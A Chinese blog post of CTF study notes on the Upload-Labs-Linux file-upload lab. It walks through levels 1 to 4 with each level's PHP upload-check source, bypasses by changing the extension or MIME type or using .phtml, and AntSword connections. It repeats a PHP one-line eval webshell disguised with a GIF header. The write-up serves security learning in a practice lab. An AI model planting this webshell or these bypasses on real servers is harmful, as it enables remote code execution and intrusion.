Upload-Labs-Linux1学习笔迹 (图文介绍)

最新推荐文章于 2025-10-17 18:37:53 发布
原创 最新推荐文章于 2025-10-17 18:37:53 发布 · 1.4k 阅读 · 29 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#学习

lab 1

前端绕过jpg,后端改php后缀,通过蚁剑连接,在根目录下找到flag,

flag{71dc5328-c145-4fbf-a987-4dfb4c1dacd1}

//写以下文件a.jpg

GIF89
<?php @eval($_POST['cmd']); ?>

labs 2

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {//检查提交
    if (file_exists(UPLOAD_PATH)) { //文件是否存在
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];//路径中文件名分离
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }
}

观察代码,同样没对图片进行检查,只对文件后缀名进行了前端验证(一句话木马,本篇通用)

//写以下文件a.jpg

GIF89
<?php @eval($_POST['cmd']); ?>

修改文件jpg后缀为.php

打开图片链接

蚁剑连接

labs3

观察源码,对文件进行了些过滤,但是,这道图题还无需如此复杂,我们还是按照前两道题方式,上传文件,在burp中改名为phtml文件名后缀名,当然这种文件后缀名同样的可以被apache解析

//写以下文件a.jpg

GIF89
<?php @eval($_POST['cmd']); ?>
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');//黑名单
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

连接成功!

labs4

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf"
最低0.47元/天 解锁文章
Upload-Labs-Linux
weixin_46601305的博客
01-24 1258
BUUCTF 靶场 Upload-Labs-Linux
BUUCTF/Upload-Labs-Linux
weixin_44041994的博客
03-20 2340
strrchr()函数作用为查找字符串在另一字符串中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符,本用来返回后缀名,如:webshell.php,则会返回.php,但是如果我们在.php后再加入一个 . ,则该函数只会返回 . ,可以轻松绕过检查。ps:只能是Windows系统,并且只能是php文件。文件的上传过程为:用户上传文件,服务器获取文件,然后保存临时文件,然后使用移动函数(比如php中的move_uploaded_file() ),才会将文件移动到站点的根目录下面。
Upload-Labs-Linux 1(PASS 01、PASS 02、PASS 03) 新手解题思路
最新发布
weixin_47074981的博客
10-17 740
Upload-Labs-Linux 1(PASS 01、PASS 02、PASS 03) 新手解题思路
BUU basic模块 Upload-Labs-Linux 1
weixin_52942048的博客
10-06 891
【代码】BUU basic模块 Upload-Labs-Linux 1
Upload-Labs-Linux1
liuxiaoning_的博客
06-19 924
Upload-Labs-Linux1
Upload-Labs-Linux1【CTF】
I_WORM的博客
02-23 1353
phpinfo()?</script>等格式;这是很操蛋的一点儿;>格式过滤呢,绕了半天也没绕过;最后放弃了,直接使用<?>竟然过了,真的裂开。文件名改为php的,内容改为一句话木马;拿到这道题目一看,发现是upload靶场;该关只识别标准php语法:<?第一关是前端验证的;点击上传,成功上传;蚁剑连接成功,在根目录下找到flag。
精选资源
安装upload-labs
10-22
1. 学习文件上传漏洞课程:upload-labs提供了详细的课程讲解文件上传漏洞的基础知识和实践经验,您可以通过学习这些课程来了解文件上传漏洞的原理和防御方法。 2. 根据关卡提示信息练习:upload-labs提供了多个关卡...
upload-labs靶场
09-09
upload-labs靶场不仅是一个提高网络安全技能的实战平台,也是学习Web应用安全、尤其是上传漏洞防御的绝佳资源。通过不断的学习和实践,用户可以加深对上传漏洞的理解,提升应对真实环境中可能出现的安全威胁的能力。
精选资源
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础...
BUUCTF——Basic-Upload-Labs-Linux(Pass01
Zichel77的博客
08-18 3494
该文件上传成功,显示的是一张破损的图片,毕竟这根本不是一个jpg文件。于是构造webshell,并修改后缀为.jpg。php文件内容为一句话木马,且连接密码为123。点击添加后即可发现界面中出现连接成功。打开题目就是Upload Labs。将文件名修改为1.php.jpg。双击添加的数据即可访问网站的目录。网站对上传文件的后缀加上了限制。在蚁剑空白处右键 选择添加数据。上传其他类型的文件时报错。可上传正常的图片文件。...
【Basic】Upload-Labs-Linux
欢迎来到我的学习笔记薄
05-19 1192
美好的一天从刷题开始。
Upload-Labs-Linux 1-20(buuctf)
qq_66748496的博客
12-24 2539
buuoj.cn上的upload_lab 1-20简要题解,项目地址:https://github.com/c0ny1/upload-labs
【CTF Web】BUUCTF Upload-Labs-Linux Pass-01 Writeup(JS分析+代码审计+文件上传)
HEX9CF的技术博客
08-29 1487
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。
Upload-Labs-Linux_upload-labs-linux 1,网络安全面试必问
m0_60732644的博客
04-06 1053
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
[BUUCTF]-Basic-Upload-Labs-Linux
yzl_007的博客
08-27 6109
[BUUCTF]-Basic-Upload-Labs-Linux 打开环境地址,其实是upload-labs这个文件上传漏洞靶场,之前有文件已经介绍了各个关卡的通过技巧,这里给上链接 https://blog.youkuaiyun.com/yzl_007/article/details/119395730 然后这里演示一下第一关吧 禁用掉javascript,将划线部分删去 然后直接上传php一句话木马文件 返回地址 …/upload/shell.php 蚁剑连接 然后在根目录找到flag 可以每一关都尝试一下
Upload-Labs-Linux1 使用 一句话木马
weixin_42515203的博客
06-18 899
Upload-Labs-Linux 1 关于一句话木马知识。
upload-labs靶场搭建linux
07-03
Linux系统上搭建upload-labs靶场环境,可以使用多种方式实现。以下是基于容器技术(如Podman或Docker)和传统PHP环境的两种主要方法。 ### 使用Podman安装upload-labs 如果已经安装了Podman,则可以直接拉取相关的镜像来运行upload-labs靶场。对于Debian 12用户来说,确保首先按照官方文档或其他可靠资源完成Podman的安装[^1]。 #### 步骤如下: 1. **拉取镜像**:通过命令行执行 `podman pull` 命令获取包含upload-labs的镜像。 ```bash podman pull <image-name> ``` 2. **创建并启动容器**:利用获取到的镜像创建一个新的容器,并映射必要的端口以便访问Web服务。 ```bash podman run -d -p 80:80 --name upload-labs-container <image-id> ``` 这里假设镜像内的Web服务器监听的是默认HTTP端口80,并且你想将它映射到主机上的相同端口。 3. **验证部署**:打开浏览器,访问 `http://localhost/upload-labs` 或者根据实际配置调整URL以检查是否能够正确加载upload-labs页面。 ### 使用Docker安装upload-labs 若选择使用Docker作为容器平台,步骤与Podman类似,但需替换相应的CLI工具命令。 1. **获取Docker镜像** ```bash docker pull <docker-image-name> ``` 2. **启动Docker容器** ```bash docker run -d -p 80:80 --name upload-labs-docker <docker-image-id> ``` 3. **确认应用可达性**:同样地,在本地或远程客户端尝试访问该服务。 ### 手动安装upload-labs 当不希望通过容器化方案时,也可以手动设置一个支持PHP的环境来托管upload-labs项目。这通常涉及以下几个关键组件: - Web服务器(例如Apache或Nginx) - PHP解释器及其相关扩展 - MySQL数据库(可选) #### 安装流程包括: 1. **下载upload-labs源码**:从GitHub仓库或者其他提供方下载最新版本的upload-labs源代码包[^2]。 2. **解压文件**:把下载好的压缩包解压至Web服务器根目录下或者自定义位置。 3. **配置数据库**(如果有需要):依据具体的指示建立数据库结构及权限分配。 4. **修改配置文件**:编辑`config.php`等配置文件,使其匹配当前环境的具体参数如数据库连接信息等。 5. **设置权限**:保证Web服务器进程有权限读取和写入指定目录,特别是上传功能所依赖的目标路径。 6. **测试站点**:最后再次用浏览器测试网站能否正常工作。 以上就是几种常见的在Linux平台上部署upload-labs的方法。每种方法都有其适用场景,请根据实际情况和个人偏好决定采用哪种策略进行实施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大懒的猫猫虫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值